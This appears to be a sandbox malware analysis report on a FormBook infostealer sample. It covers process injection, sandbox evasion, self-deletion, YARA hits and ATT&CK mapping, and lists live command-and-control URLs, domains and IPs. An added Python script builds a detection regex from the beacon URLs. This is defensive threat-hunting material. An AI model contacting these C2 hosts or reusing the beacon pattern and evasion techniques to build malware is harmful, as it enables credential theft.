          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 5 1 2 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 2 2 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 3 1 | Security Account Manager | Virtualization/Sandbox Evasion 3 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 5 1 2 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 1 3 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 1 1 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 2 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 502315 | Sample: divpCHa0h7.exe | Start date: 13/10/2021 | Architecture: WINDOWS | Score: 100

          Start (node 2)
            DNS/IP: www.kangrungao.com; www.begukiu0.info; a.mb.cn
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
            Started: divpCHa0h7.exe (node 10)

          divpCHa0h7.exe (node 10)
            Dropped file: C:\Users\user\AppData\...\divpCHa0h7.exe.log, ASCII
            Signatures: Detected unpacking (changes PE section rights); Tries to detect virtualization through RDTSC time measurements
            Started: divpCHa0h7.exe (node 14); divpCHa0h7.exe (node 17); divpCHa0h7.exe (node 19)

          divpCHa0h7.exe (node 14)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            Started: msdt.exe (node 21)
            Injected: explorer.exe (node 24)

          msdt.exe (node 21)
            Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            Started: cmd.exe (node 27)

          explorer.exe (node 24)
            DNS/IP: www.sanlifalan.com 104.165.34.6, port 49768 -> 80, EGIHOSTINGUS, United States; websites076.homestead.com 108.167.135.122, port 49789 -> 80, UNIFIEDLAYER-AS-1US, United States; 6 other IPs or domains
            Signatures: System process connects to network (likely due to code injection or exploit)

          cmd.exe (node 27)
            Started: conhost.exe (node 29)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          divpCHa0h7.exe | 16% | Virustotal |
          divpCHa0h7.exe | 17% | ReversingLabs |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.divpCHa0h7.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.1.divpCHa0h7.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.sanlifalan.com | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://www.jiyu-kobo.co.jp/CursJ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cna-d | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cnl | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/c | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/Y0zS | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/. | 0% | URL Reputation | safe
http://www.fonts.comn | 0% | URL Reputation | safe
http://www.founder.com.cn/cn_ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0 | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/a-e7 | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.floaterslaser.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cnr-f | 0% | Avira URL Cloud | safe
www.esyscoloradosprings.com/fqiq/ | 0% | Avira URL Cloud | safe
http://www.fontbureau.comasno | 0% | Avira URL Cloud | safe
http://www.sanlifalan.com/fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/Gras | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://www.fonts.comX | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/t | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/o | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.sajatypeworks.coma-d | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ri | 0% | Avira URL Cloud | safe
http://www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS | 0% | Avira URL Cloud | safe
http://www.ribbonofficial.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr | 0% | Avira URL Cloud | safe
http://www.mambacustomboats.com/fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.sanlifalan.com | 104.165.34.6 | true | true | – | unknown
floaterslaser.com | 81.169.145.161 | true | false | – | high
www.mambacustomboats.com | 64.190.62.111 | true | false | – | high
shops.myshopify.com | 23.227.38.74 | true | false | – | high
websites076.homestead.com | 108.167.135.122 | true | false | – | high
a.mb.cn | 8.212.24.67 | true | false | – | high
www.esyscoloradosprings.com | unknown | unknown | false | – | high
www.kangrungao.com | unknown | unknown | false | – | high
www.begukiu0.info | unknown | unknown | false | – | high
www.ribbonofficial.com | unknown | unknown | false | – | high
www.floaterslaser.com | unknown | unknown | false | – | high

Contacted URLs

All six requests share the path /fqiq/ and the same z0DH token and were issued from the injected explorer.exe process, so they are the sample's configured command-and-control candidates rather than anything the decoy websites serve. FormBook configurations carry a list of domains of which typically only one is the live C2 and the rest are decoys, so treat the hosts as a set: hunt or block on the path and parameter shape, not on a single domain. The sandbox marks every entry malicious on behavioural grounds even though Avira URL Cloud rated each one safe at analysis time; a reputation feed that has simply not seen a host yet returns safe, and that must not override the verdict.

Name | Malicious | Antivirus Detection | Reputation
http://www.floaterslaser.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l | true | Avira URL Cloud: safe | unknown
www.esyscoloradosprings.com/fqiq/ | true | Avira URL Cloud: safe | low
http://www.sanlifalan.com/fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS | true | Avira URL Cloud: safe | unknown
http://www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS | true | Avira URL Cloud: safe | unknown
http://www.ribbonofficial.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr | true | Avira URL Cloud: safe | unknown
http://www.mambacustomboats.com/fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS | true | Avira URL Cloud: safe | unknown
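An added example (not part of the report, and not the malware's code) of turning the contacted URLs into hunt artefacts: it parses the list copied from the table above, discovers which query key is constant across every request (the per-sample token) and which one varies (the payload), and builds a regex that matches the request shape regardless of host or parameter order. The keys z0DH and ZvEd are specific to this build and are discovered rather than hard-coded; the one scheme-less entry in the table is normalised before parsing.

```python
"""Hunt artefacts from FormBook-style contacted URLs (added example)."""
import re
from urllib.parse import urlsplit

# Copied from the "Contacted URLs" table of the report.
CONTACTED = [
    "http://www.floaterslaser.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l",
    "www.esyscoloradosprings.com/fqiq/",
    "http://www.sanlifalan.com/fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS",
    "http://www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS",
    "http://www.ribbonofficial.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr",
    "http://www.mambacustomboats.com/fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS",
]


def normalize(url):
    """The report lists one URL without a scheme; add one so urlsplit sees a host."""
    return url if "://" in url else "http://" + url


def parse_url(url):
    parts = urlsplit(normalize(url))
    params = {}
    if parts.query:
        for piece in parts.query.split("&"):
            key, _, value = piece.partition("=")
            params[key] = value  # raw value: parse_qs would turn '+' into ' '
    return {"host": parts.hostname, "path": parts.path, "params": params}


def profile(urls):
    """Split query keys into constant ones (same value in every request,
    worth hunting on) and variable ones (payload)."""
    parsed = [parse_url(u) for u in urls]
    with_query = [p for p in parsed if p["params"]]
    keys = sorted(set().union(*(p["params"] for p in with_query)))
    constant, variable = {}, []
    for key in keys:
        in_all = all(key in p["params"] for p in with_query)
        values = {p["params"][key] for p in with_query if key in p["params"]}
        if in_all and len(values) == 1:
            constant[key] = values.pop()
        else:
            variable.append(key)
    return {
        "paths": sorted({p["path"] for p in parsed}),
        "constant_params": constant,
        "variable_params": variable,
        "hosts": sorted({p["host"] for p in parsed}),
    }


def hunt_regex(prof):
    """Regex for the request shape: one of the observed paths, each constant
    parameter with its exact value, each variable parameter present, in any order."""
    paths = "|".join(re.escape(p) for p in prof["paths"])
    fixed = "".join(r"(?=.*[?&]%s=%s(?:&|$))" % (re.escape(k), re.escape(v))
                    for k, v in prof["constant_params"].items())
    varying = "".join(r"(?=.*[?&]%s=[^&]+)" % re.escape(k)
                      for k in prof["variable_params"])
    return r"^https?://[^/]+(?:%s)(?=\?)%s%s" % (paths, fixed, varying)


def matches(regex, url):
    return re.match(regex, normalize(url)) is not None


if __name__ == "__main__":
    prof = profile(CONTACTED)
    print("paths:", prof["paths"])
    print("constant:", prof["constant_params"], "variable:", prof["variable_params"])
    print("hosts:", ", ".join(prof["hosts"]))
    rx = hunt_regex(prof)
    for u in CONTACTED:
        print("match" if matches(rx, u) else "no match", u)
```

The bare www.esyscoloradosprings.com/fqiq/ entry carries no query and so does not match; it still belongs in the host set. Applied to proxy logs, the regex catches the same sample talking to a domain the sandbox never reached, which a host blocklist alone would miss.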

URLs from Memory and Binaries

The entries below are strings found in the sample's process memory, not requests it made. The font-foundry domains (fontbureau.com, jiyu-kobo.co.jp, founder.com.cn, tiro.com and the like) come from the copyright and license metadata of fonts loaded into the process by GDI+/System.Drawing, the apache.org and collada.org entries are library license and schema identifiers, and the suffixed or truncated forms (fonts.comn, typography.netD, urwpp.deDPlease) are artefacts of string extraction from memory dumps. None of them is an indicator for this sample; the request path and parameters under Contacted URLs are.

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | – | high
http://www.jiyu-kobo.co.jp/CursJ | divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | – | high
http://www.founder.com.cn/cn/bThe | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | – | high
http://www.founder.com.cn/cna-d | divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | – | high
http://www.goodfont.co.kr | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.collada.org/2005/11/COLLADASchema9Done | divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp; divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnl | divpCHa0h7.exe, 00000001.00000003.248804655.00000000059E4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/c | divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/Y0zS | divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/. | divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.comn | divpCHa0h7.exe, 00000001.00000003.246591944.00000000059FB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn_ | divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Y0 | divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/a-e7 | divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | divpCHa0h7.exe, 00000001.00000003.246781947.00000000059FB000.00000004.00000001.sdmp | false | – | high
http://www.sandoll.co.kr | divpCHa0h7.exe, 00000001.00000003.247974313.00000000059E6000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnr-f | divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | – | high
http://www.fontbureau.com | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | – | high
http://www.fontbureau.comasno | divpCHa0h7.exe, 00000001.00000003.266066263.00000000059E0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/Gras | divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/jp/ | divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.comX | divpCHa0h7.exe, 00000001.00000003.246654381.00000000059FB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | – | high
http://www.founder.com.cn/cn | divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp; divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | – | high
http://www.jiyu-kobo.co.jp/t | divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/o | divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.coma-d | divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ri | divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers8 | divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp | false | – | high

                                                  Contacted IPs


                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.165.34.6 | www.sanlifalan.com | United States | 18779 | EGIHOSTINGUS | true
108.167.135.122 | websites076.homestead.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | false
81.169.145.161 | floaterslaser.com | Germany | 6724 | STRATOSTRATOAGDE | false
64.190.62.111 | www.mambacustomboats.com | United States | 11696 | NBS11696US | false

                                                  General Information

                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                  Analysis ID:502315
                                                  Start date:13.10.2021
                                                  Start time:19:45:01
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 55s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:divpCHa0h7.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:30
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
